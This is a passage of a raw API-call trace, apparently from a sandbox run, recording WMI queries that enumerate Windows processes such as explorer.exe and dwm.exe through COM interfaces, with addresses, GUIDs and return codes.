pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0212.484] WbemDefPath:IUnknown:QueryInterface (in: This=0x560ea60, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x560ea60) returned 0x0 [0212.484] WbemDefPath:IUnknown:AddRef (This=0x560ea60) returned 0x3 [0212.484] WbemDefPath:IUnknown:Release (This=0x560ea60) returned 0x2 [0212.484] WbemDefPath:IWbemPath:SetText (This=0x560ea60, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"912\"") returned 0x0 [0212.484] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0212.484] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0212.484] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0212.484] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0212.485] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0212.485] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0212.485] IWbemClassObject:Get (in: This=0x541a768, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x267c690*=0, plFlavor=0x267c694*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="explorer.exe", varVal2=0x0), pType=0x267c690*=8, plFlavor=0x267c694*=0) returned 0x0 [0212.485] SysStringByteLen (bstr="explorer.exe") returned 0x18 [0212.485] SysStringByteLen (bstr="explorer.exe") returned 0x18 [0212.485] IWbemClassObject:Get (in: This=0x541a768, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x267c690*=8, plFlavor=0x267c694*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="explorer.exe", varVal2=0x0), pType=0x267c690*=8, plFlavor=0x267c694*=0) returned 0x0 [0212.485] SysStringByteLen (bstr="explorer.exe") returned 0x18 [0212.485] SysStringByteLen (bstr="explorer.exe") returned 0x18 [0212.485] CoTaskMemAlloc (cb=0x4) returned 0x56056e8 [0212.485] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x56056e8, puReturned=0x267acc0 | out: apObjects=0x56056e8*=0x53fddd8, puReturned=0x267acc0*=0x1) returned 0x0 [0212.486] IUnknown:QueryInterface (in: This=0x53fddd8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x53fddd8) returned 0x0 [0212.486] IUnknown:QueryInterface (in: This=0x53fddd8, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0212.486] IUnknown:QueryInterface (in: This=0x53fddd8, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0212.487] IUnknown:AddRef (This=0x53fddd8) returned 0x3 [0212.487] IUnknown:QueryInterface (in: This=0x53fddd8, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0212.487] IUnknown:QueryInterface (in: This=0x53fddd8, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0212.487] IUnknown:QueryInterface (in: This=0x53fddd8, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x53fdddc) returned 0x0 [0212.487] IMarshal:GetUnmarshalClass (in: This=0x53fdddc, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0212.487] IUnknown:Release (This=0x53fdddc) returned 0x3 [0212.487] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0212.487] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0212.487] IUnknown:QueryInterface (in: This=0x53fddd8, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0212.487] IUnknown:Release (This=0x53fddd8) returned 0x2 [0212.487] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0212.487] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0212.487] IUnknown:QueryInterface (in: This=0x53fddd8, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x53fddd8) returned 0x0 [0212.487] IUnknown:AddRef (This=0x53fddd8) returned 0x4 [0212.487] IUnknown:Release (This=0x53fddd8) returned 0x3 [0212.487] IUnknown:Release (This=0x53fddd8) returned 0x2 [0212.487] CoTaskMemFree (pv=0x56056e8) [0212.487] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0212.488] IUnknown:AddRef (This=0x53fddd8) returned 0x3 [0212.488] IWbemClassObject:Get (in: This=0x53fddd8, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0212.488] IWbemClassObject:Get (in: This=0x53fddd8, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1052\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0212.488] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1052\"") returned 0x66 [0212.488] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1052\"") returned 0x66 [0212.488] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0212.488] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0212.488] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0212.488] IUnknown:Release (This=0x6d0cac) returned 0x1 [0212.489] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x56056e8) returned 0x0 [0212.489] WbemDefPath:IUnknown:QueryInterface (in: This=0x56056e8, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0212.489] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56056e8, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x560eb40) returned 0x0 [0212.489] WbemDefPath:IUnknown:Release (This=0x56056e8) returned 0x0 [0212.489] WbemDefPath:IUnknown:QueryInterface (in: This=0x560eb40, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x560eb40) returned 0x0 [0212.489] WbemDefPath:IUnknown:QueryInterface (in: This=0x560eb40, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0212.490] WbemDefPath:IUnknown:AddRef (This=0x560eb40) returned 0x3 [0212.490] WbemDefPath:IUnknown:QueryInterface (in: This=0x560eb40, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0212.490] WbemDefPath:IUnknown:QueryInterface (in: This=0x560eb40, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0212.490] WbemDefPath:IUnknown:QueryInterface (in: This=0x560eb40, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x56056f8) returned 0x0 [0212.490] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x56056f8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0212.490] WbemDefPath:IUnknown:Release (This=0x56056f8) returned 0x3 [0212.490] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0212.490] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0212.490] WbemDefPath:IUnknown:QueryInterface (in: This=0x560eb40, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0212.490] WbemDefPath:IUnknown:Release (This=0x560eb40) returned 0x2 [0212.490] WbemDefPath:IUnknown:Release (This=0x560eb40) returned 0x1 [0212.490] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0212.490] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0212.490] WbemDefPath:IUnknown:QueryInterface (in: This=0x560eb40, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x560eb40) returned 0x0 [0212.490] WbemDefPath:IUnknown:AddRef (This=0x560eb40) returned 0x3 [0212.490] WbemDefPath:IUnknown:Release (This=0x560eb40) returned 0x2 [0212.490] WbemDefPath:IWbemPath:SetText (This=0x560eb40, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1052\"") returned 0x0 [0212.490] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0212.490] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0212.490] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0212.490] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0212.490] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0212.491] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0212.491] IWbemClassObject:Get (in: This=0x53fddd8, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x267cf10*=0, plFlavor=0x267cf14*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="dwm.exe", varVal2=0x0), pType=0x267cf10*=8, plFlavor=0x267cf14*=0) returned 0x0 [0212.491] SysStringByteLen (bstr="dwm.exe") returned 0xe [0212.491] SysStringByteLen (bstr="dwm.exe") returned 0xe [0212.491] IWbemClassObject:Get (in: This=0x53fddd8, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x267cf10*=8, plFlavor=0x267cf14*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="dwm.exe", varVal2=0x0), pType=0x267cf10*=8, plFlavor=0x267cf14*=0) returned 0x0 [0212.491] SysStringByteLen (bstr="dwm.exe") returned 0xe [0212.491] SysStringByteLen (bstr="dwm.exe") returned 0xe [0212.491] CoTaskMemAlloc (cb=0x4) returned 0x5605728 [0212.491] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5605728, puReturned=0x267acc0 | out: apObjects=0x5605728*=0x5454cf8, puReturned=0x267acc0*=0x1) returned 0x0 [0212.492] IUnknown:QueryInterface (in: This=0x5454cf8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x5454cf8) returned 0x0 [0212.492] IUnknown:QueryInterface (in: This=0x5454cf8, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0212.492] IUnknown:QueryInterface (in: This=0x5454cf8, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0212.492] IUnknown:AddRef (This=0x5454cf8) returned 0x3 [0212.492] IUnknown:QueryInterface (in: This=0x5454cf8, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0212.492] IUnknown:QueryInterface (in: This=0x5454cf8, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0212.492] IUnknown:QueryInterface (in: This=0x5454cf8, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x5454cfc) returned 0x0 [0212.492] IMarshal:GetUnmarshalClass (in: This=0x5454cfc, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0212.492] IUnknown:Release (This=0x5454cfc) returned 0x3 [0212.492] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0212.493] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0212.493] IUnknown:QueryInterface (in: This=0x5454cf8, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0212.493] IUnknown:Release (This=0x5454cf8) returned 0x2 [0212.493] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0212.493] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0212.493] IUnknown:QueryInterface (in: This=0x5454cf8, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x5454cf8) returned 0x0 [0212.493] IUnknown:AddRef (This=0x5454cf8) returned 0x4 [0212.493] IUnknown:Release (This=0x5454cf8) returned 0x3 [0212.493] IUnknown:Release (This=0x5454cf8) returned 0x2 [0212.493] CoTaskMemFree (pv=0x5605728) [0212.493] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0212.493] IUnknown:AddRef (This=0x5454cf8) returned 0x3 [0212.493] IWbemClassObject:Get (in: This=0x5454cf8, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0212.493] IWbemClassObject:Get (in: This=0x5454cf8, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1288\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0212.494] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1288\"") returned 0x66 [0212.494] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1288\"") returned 0x66 [0212.494] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0212.494] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0212.494] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0212.494] IUnknown:Release (This=0x6d0cac) returned 0x1 [0212.494] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x5605728) returned 0x0 [0212.495] WbemDefPath:IUnknown:QueryInterface (in: This=0x5605728, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0212.495] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5605728, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x560ec20) returned 0x0 [0212.495] WbemDefPath:IUnknown:Release (This=0x5605728) returned 0x0 [0212.495] WbemDefPath:IUnknown:QueryInterface (in: This=0x560ec20, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x560ec20) returned 0x0 [0212.495] WbemDefPath:IUnknown:QueryInterface (in: This=0x560ec20, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0212.495] WbemDefPath:IUnknown:AddRef (This=0x560ec20) returned 0x3 [0212.495] WbemDefPath:IUnknown:QueryInterface (in: This=0x560ec20, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0212.495] WbemDefPath:IUnknown:QueryInterface (in: This=0x560ec20, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0212.495] WbemDefPath:IUnknown:QueryInterface (in: This=0x560ec20, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x5605738) returned 0x0 [0212.495] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5605738, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, 